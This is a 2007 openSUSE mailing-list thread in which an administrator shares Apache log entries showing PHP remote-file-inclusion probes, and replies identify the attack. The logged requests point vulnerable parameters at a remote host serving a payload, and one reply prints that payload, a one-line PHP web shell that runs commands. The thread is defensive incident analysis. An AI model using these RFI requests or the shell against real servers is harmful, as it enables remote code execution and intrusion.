[opensuse] Apache access log errors - attack?
Hello, I found these errors in our web logs and it appears that either there is a PHP attack on the apache site or perhaps a kit on the server? Errors below (profanity not mine); 69.94.131.24 - - [02/Apr/2007:09:34:09 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://203.198.68.236/~li sir/M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner" 69.94.131.24 - - [02/Apr/2007:09:34:10 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http: //203.198.68.236/~lisir/M.tx t?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner" 69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET /modules/Forums/admin/admin_mass_email.php?phpbb_root_path=http://203.198.68 .236/~lisir/M.txt?/ HTTP/1.1 " 404 1046 "-" "Morfeus Fucking Scanner" 69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET /modules/Forums/admin/index.php?phpbb_root_path=http://203.198.68.236/~lisir /M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner" 69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://203.198.68. 236/~lisir/M.txt?&/ HTTP/1.1 " 404 1046 "-" "Morfeus Fucking Scanner" 69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET /modules/Forums/admin/admin_mass_email.php?phpbb_root_path=http://203.198.68 .236/~lisir/M.txt?&/ HTTP/1. 1" 404 1046 "-" "Morfeus Fucking Scanner" 69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET /dokeos/claroline/auth/ldap/authldap.php?includePath=http://203.198.68.236/~ lisir/M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner" 69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET /modules/mx_links/language/lang_english/lang_admin.php?mx_root_path=http://2 03.198.68.236/~lisir/M.txt?& / HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner" 69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET /index.php?page=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 200 12222 "-" "Morfeus Fucking Scanner" 69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET /sendstudio/admin/includes/createemails.inc.php?ROOTDIR=http://203.198.68.23 6/~lisir/M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner" 69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET /sendstudio/admin/includes/send_emails.inc.php?ROOTDIR=http://203.198.68.236 /~lisir/M.txt?&/ HTTP/1.1" 4 04 1046 "-" "Morfeus Fucking Scanner" 69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET /admin/includes/createemails.inc.php?ROOTDIR=http://203.198.68.236/~lisir/M. txt?&/ HTTP/1.1" 404 1046 "- " "Morfeus Fucking Scanner" 69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET /admin/includes/send_emails.inc.php?ROOTDIR=http://203.198.68.236/~lisir/M.t xt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner" 69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET /createemails.inc.php?ROOTDIR=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fuck ing Scanner" 69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET /send_emails.inc.php?ROOTDIR=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucki ng Scanner" <snip> It looks like they are getting a '404' error 'page not found', although these requests are not a welcomed sight. Thank you, ~James -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org For additional commands, e-mail: opensuse+help@opensuse.org
On Wed, Apr 25, 2007 at 01:45:34PM -0700, James D. Parra wrote:
Hello,
I found these errors in our web logs and it appears that either there is a PHP attack on the apache site or perhaps a kit on the server?
Errors below (profanity not mine);
69.94.131.24 - - [02/Apr/2007:09:34:09 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://203.198.68.236/~li sir/M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner"
Looks like some kind of PHP include attack scanner, against lots of PHP apps. M.txt contains: <? system($_GET['cmd']); die ("Morfeus hacked you"); ?> ciao, Marcus -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org For additional commands, e-mail: opensuse+help@opensuse.org
On Wednesday 25 April 2007 14:48, Marcus Meissner wrote:
On Wed, Apr 25, 2007 at 01:45:34PM -0700, James D. Parra wrote:
Hello,
I found these errors in our web logs and it appears that either there is a PHP attack on the apache site or perhaps a kit on the server?
Errors below (profanity not mine);
69.94.131.24 - - [02/Apr/2007:09:34:09 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://203.198.6 8.236/~li sir/M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner"
Looks like some kind of PHP include attack scanner, against lots of PHP apps.
It looks like an indirect injection exploit--getting the hacker's code to run in the environment of the server to which it is sent. Is PHP really so trusting as to load and execute remote code in the manner suggested by this attack? Similar things are possible with database applications when the author naively uses string concatenation to combine template query fragments with user-supplied parameters.
M.txt contains: <? system($_GET['cmd']); die ("Morfeus hacked you"); ?>
Looks like: a) Morfeus doesn't spell very well. b) Morfeus knows only Windows. c) Morfeus is kind of rude.
ciao, Marcus
Randall Schulz -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org For additional commands, e-mail: opensuse+help@opensuse.org
James D. Parra escribió:
Hello,
I found these errors in our web logs and it appears that either there is a PHP attack on the apache site or perhaps a kit on the server?
Errors below (profanity not mine);
69.94.131.24 - - [02/Apr/2007:09:34:09 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://203.198.68.236/~li sir/M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner"
Remote code execution attack to some PHPbb mods, the other ones attempted to exploit holes in applications liek mambo CMS that has code affected by $GLOBAL overwrite PHP vulnerability http://www.hardened-php.net/advisory_202005.79.html
participants (4)
-
Cristian Rodriguez R.
-
James D. Parra
-
Marcus Meissner
-
Randall R Schulz